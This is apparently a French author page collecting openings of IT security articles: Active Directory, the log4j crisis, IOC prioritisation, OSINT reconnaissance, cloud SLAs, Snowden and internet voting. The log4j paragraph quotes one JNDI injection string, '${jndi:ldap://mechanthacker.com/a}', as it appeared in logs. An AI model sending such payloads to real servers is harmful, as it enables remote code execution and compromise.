Foll Cédric

Active Directory est une brique technique introduite par Microsoft en 1999 avec la sortie de Windows 2000. Il est devenu rapidement incontournable dans la quasi-totalité des entreprises pour la gestion des postes et serveurs Windows, remplaçant avantageusement les scripts dans le menu « Démarrer » pour le déploiement de configurations, logiciels et mises à jour. Au gré des nouvelles versions de Windows, les fonctionnalités se sont considérablement enrichies et les mécanismes de compatibilité ascendante se sont empilés, ne réglant que très partiellement les problèmes de sécurité historique, tout en ajoutant de la complexité.

Nous nous souviendrons tous un moment de ce vendredi après-midi quand les premières annonces sur log4j sont arrivées et que nous avons tous vu dans nos logs se multiplier les “${jndi:ldap://mechanthacker.com/a}” en l’espace de quelques minutes. Pour beaucoup d’entre nous, le week-end a été long, une course contre la montre pour éviter de se retrouver avec un système d’information ressemblant à un champ de ruines le lundi matin, ou tout aussi probablement une ferme de minage de cryptomonnaies. Une caractéristique particulière de cette faille a certainement été le niveau de massification des attaques en l’espace de quelques heures. Tout serveur accessible sur les ports 80 et 443, même non référencé par les moteurs de recherche s’est retrouvé attaqué depuis des adresses IP multiples dès vendredi après-midi. Il est probable que certains groupes de pirates disposent d’ores et déjà d’une grande quantité de serveurs compromis qu’ils pourront monétiser dans un second temps, par exemple avec des campagnes de ransomware.

Dans le cadre de l’amélioration du niveau de maturité de la gestion de la sécurité des systèmes d’information, il convient d'appréhender correctement les menaces. Si certaines d’entre elles sont génériques et communes à l’ensemble des organisations, d’autres vont cibler plus spécifiquement certaines typologies d’entreprises ou administrations. Typiquement, une banque, une société de e-commerce, un hôpital ou le ministère de la Défense ne vont pas faire l’objet de la même typologie d’attaquants ni du même outillage. Par conséquent, les IOC à rechercher en priorité sur vos infrastructures devront être adaptées à moins de rapidement épuiser vos forces.

Afin de maximiser les chances de réussite lors d’une candidature, nous nous sommes tous prêtés au jeu de chercher des informations sur la société concernée ainsi que ses salariés actuels ou anciens. L’abondance d’informations accessibles, surtout depuis l’avènement des réseaux sociaux, qu’ils soient professionnels ou récréatifs, permet facilement d’obtenir de précieuses informations sur le fonctionnement de l’entreprise, les briques techniques utilisées, le parcours et la personnalité des recruteurs. Ces techniques peuvent également être utilisées dans une perspective offensive, tant le parcours des blogs techniques ou des fiches LinkedIn des salariés d’une entreprise peuvent être utiles non seulement pour déterminer l’ensemble des technologies utilisées dans l’entreprise, briques de sécurité comprises telles que les antivirus, EDR ou firewall, mais également pour reconstituer l’organigramme d’une société afin d’augmenter les chances d’une attaque s’appuyant sur du social engineering.

Les principaux fournisseurs de Cloud peuvent proposer des SLA bien au-delà de ce que la plupart des DSI sont en capacité d’atteindre. Ainsi, pour une DSI, faire le choix de déployer ses applications sur un IaaS ou d’opter pour une messagerie en mode SaaS chez Google ou Microsoft permettra de garantir une certaine tranquillité d’esprit quant à l'amélioration du taux de disponibilité des applications gérées en interne sur ses propres infrastructures. N’en déplaise aux pseudos-spécialistes affirmant que l’auto-hébergement, parfois derrière une ligne ADSL pour les plus hardis, est à privilégier, c’est très loin d’être la solution la plus fiable. Pour atteindre un SLA de 99,9% à 99,99%, il faut non seulement un data center Tiers 3, plusieurs accès opérateurs avec des arrivées fibres empruntant des chemins distincts afin que la connectivité internet ne soit pas le maillon faible, mais surtout des briques logicielles sur lesquelles il doit être possible de réaliser des opérations de maintenance sans rupture de service.

Quand j’ai commencé ma carrière, il n’était pas rare de recompiler le noyau des serveurs ou de faire des installations à coup de ./configure;make;make install. Dès lors, à chaque fois qu’un paquet de la distribution devait être installé, il fallait jouer avec les options --nodeps --force parce que la moitié des logiciels avaient été installés depuis les sources. Les fichiers de configuration dans /etc étaient suffixés par des extensions exotiques du type .backup, .sos, .nepaseffacer, .derniereversionquifonctionne...

Il y a 8 ans, Edward Snowden révélait les capacités de la NSA en matière d’écoute et d’interception des communications. Le grand public découvrait que les États-Unis d’Amérique réalisaient des écoutes en masse des communications, étaient en capacité de les déchiffrer et avaient un accès direct aux données des principaux fournisseurs de services sur leur territoire.

La supervision de la sécurité des terminaux est souvent le parent pauvre des directions informatiques. Pendant longtemps, l’alpha et l'oméga en matière de gestion de la sécurité des terminaux se sont résumé à un antivirus, avec dans le meilleur des cas une console centralisée, l’application des patch tuesday et une authentification via contrôleur de domaine sans droits d'administration pour les usagers.

À chaque nouvelle élection, surtout lorsque le taux de participation est décevant, revient le marronnier du vote électronique par Internet : « Face à l’abstention massive, un chantier urgent s’impose : la modernisation du vote. Vote par correspondance, vote électronique sécurisé : notre démocratie doit s’adapter à nos vies d’aujourd’hui, en restant irréprochable ! » [1].